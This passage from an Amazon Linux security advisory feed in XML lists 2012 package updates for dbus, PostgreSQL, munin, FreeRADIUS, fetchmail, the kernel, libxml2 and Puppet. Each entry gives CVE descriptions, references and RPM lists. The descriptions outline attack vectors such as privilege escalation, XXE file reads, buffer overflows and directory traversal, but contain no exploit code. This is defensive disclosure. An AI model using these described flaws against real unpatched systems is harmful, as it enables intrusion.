</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4405" title="" id="CVE-2012-4405" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1256.html" title="" id="RHSA-2012:1256" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ghostscript-doc" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-15.22.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-15.22.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-15.22.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-15.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-128</id><title>Amazon Linux - ALAS-2012-128: medium priority package update for 
dbus</title><issued date="2012-09-22 21:37:00" /><updated date="2014-09-14 17:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3524:
libdbus 1.5.x and earlier, when used in setuid or other privileged programs in X.org and possibly other products, allows local users to gain privileges and execute arbitrary code via the DBUS_SYSTEM_BUS_ADDRESS environment variable. NOTE: libdbus maintainers state that this is a vulnerability in the applications that do not cleanse environment variables, not in libdbus itself: "we do not support use of libdbus in setuid binaries that do not sanitize their environment before their first call into libdbus."
It was discovered that the D-Bus library honored environment settings even when running with elevated privileges. A local attacker could possibly use this flaw to escalate their privileges, by setting specific environment variables before running a setuid or setgid application linked against the D-Bus library (libdbus).
847402:
CVE-2012-3524 dbus: privilege escalation when libdbus is used in setuid/setgid application
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3524" title="" id="CVE-2012-3524" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1261.html" title="" id="RHSA-2012:1261" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="dbus-libs" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-libs-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus-debuginfo" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-debuginfo-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus-devel" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-devel-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus-doc" version="1.2.24" release="7.16.amzn1" epoch="1" arch="noarch"><filename>Packages/dbus-doc-1.2.24-7.16.amzn1.noarch.rpm</filename></package><package name="dbus" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-1.2.24-7.16.amzn1.x86_64.rpm</filename></package><package name="dbus-devel" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-devel-1.2.24-7.16.amzn1.x86_64.rpm</filename></package><package name="dbus-libs" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-libs-1.2.24-7.16.amzn1.x86_64.rpm</filename></package><package name="dbus-debuginfo" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-debuginfo-1.2.24-7.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-129</id><title>Amazon Linux - ALAS-2012-129: medium priority package update for postgresql8</title><issued date="2012-09-22 21:38:00" /><updated date="2014-09-14 17:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3489:
It was found that the "xml" data type allowed local files and remote URLs to be read with the privileges of the database server to resolve DTD and entity references in the provided XML. An unprivileged database user could use this flaw to read local files they would otherwise not have access to by issuing a specially-crafted SQL query. Note that the full contents of the files were not returned, but portions could be displayed to the user via error messages.
849173:
CVE-2012-3489 postgresql: File disclosure through XXE in xmlparse by DTD validation
CVE-2012-3488:
It was found that the optional PostgreSQL xml2 contrib module allowed local files and remote URLs to be read and written to with the privileges of the database server when parsing Extensible Stylesheet Language Transformations (XSLT). An unprivileged database user could use this flaw to read and write to local files (such as the database's configuration files) and remote URLs they would otherwise not have access to by issuing a specially-crafted SQL query.
849172:
CVE-2012-3488 postgresql (xml2 contrib module): XXE by applying XSL stylesheet to the document
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3488" title="" id="CVE-2012-3488" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489" title="" id="CVE-2012-3489" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1263.html" title="" id="RHSA-2012:1263" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql8-debuginfo" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.13" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql8-libs-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.13" release="1.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql8-devel-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.13-1.37.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-130</id><title>Amazon Linux - ALAS-2012-130: medium priority package update for munin</title><issued date="2012-10-08 10:39:00" /><updated date="2014-09-14 17:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3512:
849830:
CVE-2012-3512 munin: insecure state file handling, munin-&gt;root privilege
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3512" title="" id="CVE-2012-3512" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="munin-common" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin-async" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.6-2.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-131</id><title>Amazon Linux - ALAS-2012-131: medium priority package update for freeradius</title><issued date="2012-10-08 10:40:00" /><updated date="2014-09-14 17:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3547:
Stack-based buffer overflow in the cbtls_verify function in FreeRADIUS 2.1.10 through 2.1.12, when using TLS-based EAP methods, allows remote attackers to cause a denial of service (server crash) and possibly execute arbitrary code via a long "not after" timestamp in a client certificate.
A buffer overflow flaw was discovered in the way radiusd handled the expiration date field in X.509 client certificates. A remote attacker could possibly use this flaw to crash radiusd if it were configured to use the certificate or TLS tunnelled authentication methods (such as EAP-TLS, EAP-TTLS, and PEAP).
852752:
CVE-2012-3547 freeradius: stack-based buffer overflow via long expiration date fields in client X509 certificates
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3547" title="" id="CVE-2012-3547" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1326.html" title="" id="RHSA-2012:1326" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freeradius-perl" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-utils-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-mysql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-debuginfo" version="2.1.12" release="4.11.amzn1" 
epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-postgresql-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-ldap" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-utils" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-utils-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-python" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.1.12-4.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-132</id><title>Amazon Linux - ALAS-2012-132: low priority package update for fetchmail</title><issued date="2012-10-08 10:41:00" /><updated date="2014-09-14 17:08:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3482:
847988:
CVE-2012-3482 fetchmail: DoS (crash) in the base64 decoder upon server NTLM protocol exchange abort right after the initial request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3482" title="" id="CVE-2012-3482" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="fetchmail" version="6.3.17" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/fetchmail-6.3.17-1.9.amzn1.i686.rpm</filename></package><package name="fetchmail-debuginfo" version="6.3.17" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/fetchmail-debuginfo-6.3.17-1.9.amzn1.i686.rpm</filename></package><package name="fetchmail-debuginfo" version="6.3.17" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/fetchmail-debuginfo-6.3.17-1.9.amzn1.x86_64.rpm</filename></package><package name="fetchmail" version="6.3.17" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/fetchmail-6.3.17-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-133</id><title>Amazon Linux - ALAS-2012-133: medium priority package update for kernel</title><issued date="2012-10-08 10:43:00" /><updated date="2014-09-14 17:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3552:
Race condition in the IP implementation in the Linux kernel before 3.0 might allow remote attackers to cause a denial of service (slab corruption and system crash) by sending packets to an application that sets socket options during the handling of network traffic.
853465:
CVE-2012-3552 kernel: net: slab corruption due to improper synchronization around inet-&gt;opt
* A race condition was found in the way access to inet->opt ip_options was synchronized in the Linux kernel's TCP/IP protocol suite implementation. Depending on the network facing applications running on the system, a remote attacker could possibly trigger this flaw to cause a denial of service. A local, unprivileged user could use this flaw to cause a denial of service regardless of the applications the system runs.
CVE-2012-3430:
820039:
CVE-2012-3430 kernel: recv{from,msg}() on an rds socket can leak kernel memory
* A flaw was found in the way the msg_namelen variable in the rds_recvmsg() function of the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation was initialized. A local, unprivileged user could use this flaw to leak kernel stack memory to user-space.
CVE-2012-2390:
Memory leak in mm/hugetlb.c in the Linux kernel before 3.4.2 allows local users to cause a denial of service (memory consumption or system crash) via invalid MAP_HUGETLB mmap operations.
824345:
CVE-2012-2390 kernel: huge pages: memory leak on mmap failure
* A memory leak flaw was found in the way the Linux kernel's memory subsystem handled resource clean up in the mmap() failure path when the MAP_HUGETLB flag was set. A local, unprivileged user could use this flaw to cause a denial of service.
CVE-2012-2384:
Integer overflow in the i915_gem_do_execbuffer function in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the Direct Rendering Manager (DRM) subsystem in the Linux kernel before 3.3.5 on 32-bit platforms allows local users to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted ioctl call.
824178:
CVE-2012-2384 kernel: drm/i915: integer overflow in i915_gem_do_execbuffer()
* An integer overflow flaw was found in the i915_gem_do_execbuffer() function in the Intel i915 driver in the Linux kernel. A local, unprivileged user could use this flaw to cause a denial of service. This issue only affected 32-bit systems.
CVE-2012-2313:
The rio_ioctl function in drivers/net/ethernet/dlink/dl2k.c in the Linux kernel before 3.3.7 does not restrict access to the SIOCSMIIREG command, which allows local users to write data to an Ethernet adapter via an ioctl call.
818820:
CVE-2012-2313 kernel: unfiltered netdev rio_ioctl access by users
* A flaw was found in the way the Linux kernel's dl2k driver, used by certain D-Link Gigabit Ethernet adapters, restricted IOCTLs. A local, unprivileged user could use this flaw to issue potentially harmful IOCTLs, which could cause Ethernet adapters using the dl2k driver to malfunction (for example, losing network connectivity).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2313" title="" id="CVE-2012-2313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2384" title="" id="CVE-2012-2384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2390" title="" id="CVE-2012-2390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3430" title="" id="CVE-2012-3430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3552" title="" id="CVE-2012-3552" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1304.html" title="" id="RHSA-2012:1304" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.30" release="49.59.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.30-49.59.amzn1.noarch.rpm</filename></package><package name="kernel-tools" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.30" release="49.59.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-headers-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.30-49.59.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-134</id><title>Amazon Linux - ALAS-2012-134: medium priority package update for libxml2</title><issued date="2012-10-15 12:20:00" /><updated date="2014-09-14 17:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following 
vulnerabilities:
CVE-2012-2807:
Multiple integer overflows in libxml2, as used in Google Chrome before 20.0.1132.43, on 64-bit Linux platforms allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way libxml2 handled documents that enable entity expansion. A remote attacker could provide a large, specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
835863:
CVE-2012-2807 libxml2 (64-bit): Multiple integer overflows, leading to DoS or possibly other unspecified impact
CVE-2011-3102:
Off-by-one error in libxml2, as used in Google Chrome before 19.0.1084.46, allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via unknown vectors.
A one byte buffer overflow was found in the way libxml2 evaluated certain parts of XML Pointer Language (XPointer) expressions. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
822109:
CVE-2011-3102 libxml: An off-by-one out-of-bounds write by XPointer part evaluation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3102" title="" id="CVE-2011-3102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2807" title="" id="CVE-2012-2807" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1288.html" title="" id="RHSA-2012:1288" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-debuginfo" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package 
name="libxml2-static" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.8-9.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-135</id><title>Amazon Linux - ALAS-2012-135: low priority package update for puppet</title><issued date="2012-10-15 12:29:00" /><updated date="2014-09-14 17:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3867:
lib/puppet/ssl/certificate_authority.rb in Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, does not properly restrict the characters in the Common Name field of a Certificate Signing Request (CSR), which makes it easier for user-assisted remote attackers to trick administrators into signing a crafted agent certificate via ANSI control sequences.
839158:
CVE-2012-3867 puppet: insufficient validation of agent names in CN of SSL certificate requests
CVE-2012-3866:
lib/puppet/defaults.rb in Puppet 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, uses 0644 permissions for last_run_report.yaml, which allows local users to obtain sensitive configuration information by leveraging access to the puppet master server to read this file.
839135:
CVE-2012-3866 puppet: information leak via world readable last_run_report.yaml
CVE-2012-3865:
Directory traversal vulnerability in lib/puppet/reports/store.rb in Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, when Delete is enabled in auth.conf, allows remote authenticated users to delete arbitrary files on the puppet master server via a .. (dot dot) in a node name.
839131:
CVE-2012-3865 puppet: authenticated clients allowed to delete arbitrary files on the puppet master
CVE-2012-3864:
Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, allows remote authenticated users to read arbitrary files on the puppet master server by leveraging an arbitrary user's certificate and private key in a GET request.
839130:
CVE-2012-3864 puppet: authenticated clients allowed to read arbitrary files from the puppet master
